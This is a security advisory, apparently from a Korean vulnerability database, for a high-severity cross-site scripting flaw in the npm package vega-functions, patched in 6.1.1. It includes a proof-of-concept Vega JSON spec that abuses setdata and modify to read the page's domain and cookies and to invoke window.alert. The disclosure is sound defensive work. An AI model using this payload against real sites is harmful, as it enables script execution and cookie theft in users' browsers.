VDB
EN
HIGH 7.2

GHSA-m9rg-mr6g-75gm

`vega-functions` vulnerable to Cross-site Scripting via `setdata` function

상세

### Impact

For sites that allow users to supply untrusted user input, malicious use of an internal function (not part of the [public API](https://vega.github.io/vega/docs/expressions/)) could be used to run unintentional javascript (XSS).

### Patches

Fixed in vega-functions `6.1.1`

### Workarounds

There is no workaround besides upgrading. Using `vega.expressionInterpreter` as described in [CSP safe mode](https://vega.github.io/vega/usage/interpreter/) does not prevent this issue.

### Exploit Proof of Concept

Vega's expression `modify()` [function](https://github.com/vega/vega/blob/d8add5819346e5af597d82ef8253742acc0283ba/packages/vega-functions/src/functions/modify.js#L40), used by setdata, allows attacker to control both the method called and the values supplied, which results to XSS . This was a previous POC:

```json { "$schema": "https://vega.github.io/schema/vega/v6.json", "data": [ { "name": "table", "values": [ {"category": "A", "amount": 28} ] } ], "signals": [ { "name": "tooltip", "value": {}, "on": [ {"events": {"type":"timer","throttle":2000}, "update": "setdata('table',[['Domain: '+event.dataflow._el.ownerDocument.domain+' , cookies: '+ event.dataflow._el.ownerDocument.cookie ]])+warn('XSS is here', modify('table',2,3,null,event.dataflow._el.ownerDocument.defaultView.alert,{'tttt':'yyyy'}) )"}, {"events": "rect:pointerout", "update": "{}"} ] } ] } ```

이 버전이 영향받나요?

사용 중인 패키지 버전을 입력하면 즉시 평가합니다.

영향 패키지

npm / vega-functions
최초 영향 버전: 0 수정 버전: 6.1.1
수정 npm install vega-functions@6.1.1

참고